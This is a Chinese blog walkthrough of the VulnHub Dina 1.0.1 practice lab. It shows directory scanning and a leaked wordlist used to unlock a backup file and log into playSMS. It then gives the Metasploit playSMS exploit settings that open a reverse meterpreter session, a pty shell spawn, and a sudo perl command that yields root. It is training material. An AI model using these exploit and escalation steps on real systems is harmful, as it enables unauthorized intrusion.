vulnhub-Dina 1.0.1靶机

已于 2024-09-23 11:45:01 修改
阅读量393 收藏 7
点赞数 8
文章标签: 安全性测试
于 2024-09-22 15:18:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wjSteve/article/details/142437625
版权

vulnhub:https://www.vulnhub.com/entry/dina-101,200/

这个靶机不知道为什么下载速度很慢几乎没有进度,但是我用迅雷就能正常下载,建议下不下来的也找个下载器试试

下载下来后导入靶机,和kali同一网段,根据靶机表述,目标是root目录下的flag文件,先扫描靶机IP

image-20240922141121467

扫描到IP地址为192.168.114.129,使用nmap扫描端口

image-20240922141149631

只扫到了80端口和网页服务,常规思路访问

image-20240922141215148

点击网页的按钮,发现跳转到了一个ange1目录下,但是目录里什么都没有

image-20240922141228930

扫描网站的目录

image-20240922141407858

通过目录扫描找到了几个目录,先看robots.txt

image-20240922141438647

又指出了两个我们没找到的目录

secure目录下有个backup.zip

image-20240922142537003

nothing目录下则有个类似密码字典的注释

image-20240922142708343

别的页面就没东西了

之前那个backup.zip发现里面是一个mp3文件,解压需要密码

image-20240922142801707

尝试刚才获得的密码,发现是freedom

检查发现这个mp3实际上是文本文件,查看发现一个url路径/SecreTSMSgatwayLogin和用户touhid

image-20240922142933755

访问url,是个登录界面

image-20240922143056044

使用touhid和diana即可登录

image-20240922143147666

在网站里没找到什么有用的功能点,尝试在MSF找一下CMS的漏洞

search playsms

image-20240922143802635

这里搜出来三个漏洞,使用0号

image-20240922143945742

填写脚本的设置

set rhost 192.168.114.129(靶机IP)

set lhost 192.168.114.128(kaliIP)

set lport 4444

set username touhid

set password diana

set targeturi /SecreTSMSgatwayLogin

image-20240922144638726

设置完成后运行脚本成功获得了一个meterpreter会话

image-20240922144735211

开启shell,并且生成交互式界面

shell

python -c 'import pty; pty.spawn("/bin/sh")'

image-20240922144842074

首先我们查询无密码的sudo命令

image-20240922144923889

利用

sudo /usr/bin/perl -e "exec '/bin/sh'"

image-20240922145017471

至此完成提权,剩下的就是去root目录拿flag

image-20240922145056301

生草工坊
关注
VulnHub靶机渗透】四:Dina-1
野原新之助
04-13 1108
靶机设定一些线索,引导用户得到相关信息,并使用了一个包含漏洞(代码执行)的Web应用系统版本。 VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
Vulnhub-Dina-1.0.1入门靶机渗透
2401_83378606的博客
09-25 564
网卡这里需要与kali处于同一网段,我这里是kali是nat,靶机就改成nat。进来后发现是个登陆界面,刚刚还给了用户名,密码先试试之前找到的密码本,尝试登陆。带上耳机准备试听,发现文件好像损坏了,那应该是还有其他用处。准备试试弱口令突然想起来刚刚泄露的密码,拿过来试试。是这个页面外,其余都是空目录,那就先从这里入手。貌似只开放了80端口,且探测出了几个目录。那就去看看有没有可提权的payload。的字眼,去msf搜搜有没有相关的漏洞。双击打开下载好的.ova文件即可。进来是这样的,左上角有个。
vulnhub-1:Dina
qq_60384876的博客
02-20 1002
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。
Vulhub靶场之Dina-1.0.1
weixin_45650977的博客
04-30 949
Vulhub靶场之Dina-1.0.1 靶机描述 环境准备 vmware15 打开 攻击机:kali NAT模式 靶机Dina1.0.1 NAT模式
Vulnhub靶机Dina: 1.0.1
whoami
09-24 876
Vulnhub靶机Dina: 1.0.1实战
Dina: 1.0.1靶机
m0_61995767的博客
08-05 450
Dina: 1.0.1打靶记录
Dina: 1.0.1(靶机渗透测试
2301_78721909的博客
07-29 799
Dina: 1.0.1 靶机渗透测试(from wuhu)
靶机渗透测试Dina: 1.0.1)
@小张小张的博客
12-07 1679
靶机渗透测试(): **Vulnhub靶机 ** 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(====) 描述:It wated for kTheBox flag进度:2/2 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令:netdiscover -i eth0 -r 192.168.10.0 靶机ip为: 192.168.10.133 2. nmap进行靶机端口服务扫描 命令:
【B2R】DINA1.0.1
qq_44339430的博客
03-24 547
【B2R】DINA:1.0.1 靶场地址:https://www.vulnhub.com/entry/dina-101,200/ 靶场信息 靶场描述 Description Back to the Top Welcome to Dina 1.0.1 ________ _________ \________\--------___ ___ ____----------/______
Dina1.0.1复现
weixin_61982677的博客
09-24 568
发现是一个 playSMS 框架的后台页面,使用 msfconsole查看是否有可利用的框架漏洞 exp。,密码还是使用之前的密码本爆破,得到结果为 diana,登录成功进入到一个 playSMS 后台界面。虚拟机默认网络模式为桥接,将网络模式修改为与 kali 一样的 NAT 模式。拼接 URL 地址访问,是一个 login 页面,用户名为。解压发现需要密码,尝试之前搜集到的密码本,发现密码为。发现 5 个不允许访问的页面有一个密码本。发现一个 zip 文件,下载下来。发现一个上传文件页面。
靶机实战-Dina 1.0
滕财然的博客
01-28 1356
Dina 1.0靶机实战 文章目录Dina 1.0靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问80端口--http服务5、提权提权方式二 1、主机发现 目标IP:192.168.232.157 2、端口扫描 3、端口详细信息扫描 只开放80端口 4、访问80端口–http服务 主页啥都没有,直接dirb扫一下目录 依次访问目录: index就是主页,就不看了 发现robo...
靶机测试--Dina
ximo的博客
03-28 394
目录信息收集主机发现端口扫描目录扫描漏洞发掘提权总结 信息收集 主机发现 端口扫描 只有80端口: 目录扫描 访问每一个可以访问的路径: 主页: nothing/pass: secure/: 漏洞发掘 得到了一个类似密码字典,一个zip文件。 下载zip文件: 需要密码,使用获得的密码freedom,解压后为mp3格式,但是无法播放: 使用文本打开: 获得了用户名和一个后台,打开: 使用diana可以成功登录: 网站框架为playsms。 搜索CMS漏洞: 有三个属于msf,使用msf
靶机【B2R】Dina-1-0-1
干铮的博客
09-27 503
【B2R】Dina-1-0-1 1.信息收集 根据靶机MAC地址获取IP。 Nmap -sP 192.168.43.0/24 Nmap 192.168.43.91 -A -p- -oN nmap.A 2.网页信息收集 访问站点 御剑扫描敏感目录 敏感目录 http://192.168.43.91/nothing/ 后台备份文件 解压文件尝试使用之前留给的密码 freedom 使用文本打开文件 访问http://192.168.43.
rhino grasshoper 框内物体排列(附视频).gh
最新发布
10-18
【闭合线内物体按方向移动/排列】https://www.bilibili.com/video/BV1z1WfeSEWu?vd_source=b420114c993138474d2e93d83ead77a5
kwant-1.4.3-cp38-cp38-win_amd64.whl
10-18
kwant-1.4.3-cp38-cp38-win_amd64.whl
rhino grasshoper 景观椅(附视频).gh
10-18
【rhino@grasshoper 曲线金属座椅景观案例(文件获取/见简介)】https://www.bilibili.com/video/BV1Dx4y147Lr?vd_source=b420114c993138474d2e93d83ead77a5
PCIe通义万问系列文档的第一部已整理完毕,含999个PCIe相关问答
10-18
《PCIe通义万问》系列文档旨在记录PCIe相关行业工程师们在PCIe协议学习、IP设计验证、产品测试及使用过程中遇到的问题、迸发的思考、进行的探讨及可能的解决方案,以期给遇到相同相似问题的同行们些许启发。文档涉及的技术方向主要为PCIe,也包含PCIe相关的CXL、UCIe及计算机体系结构相关内容。 本文档是《PCIe通义万问》系列文档之(一),含999个问题。问题内容有以下三个来源:MangoPapa(下称博主)的“PCIe每日一问一答”系列专栏;博主的博文留言及私信讨论;博主作为群主的“PCIe技术交流群”群聊内容。MangoPapa小助理、折叠、先杰、CR小队长、kangling共同完成了问答内容提取与归纳整理,噫嘘唏及慕荷负责文辞优化及编辑排版,上述人员及MangoPapa、JasonW、皮塞阿姨、席可儿参与了文档内容的审校。感谢以上人员的无私奉献。 本文档仅对讨论内容进行总结记录,不保证问题答案的正确性,部分问题只提供解决思路或讨论过程。术业有专攻,文内定有偏颇。如您发现谬误,一敬希原宥,二望乞点拨;如您持异见,欢迎来信讨论。如有需要,欢迎联系MangoPapa加入相关
MS-DINA模型的MCMC估计:多策略任务分析新视角
本文主要探讨了MS-DINA模型的MCMC估计及其在处理混合策略作答中的适用性。MS-DINA模型是由刘铁川和戴海琦基于DINA模型进行扩展的,旨在解决认知任务中多策略作答的测量学问题。DINA模型原本是用于评估个体对知识掌握...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值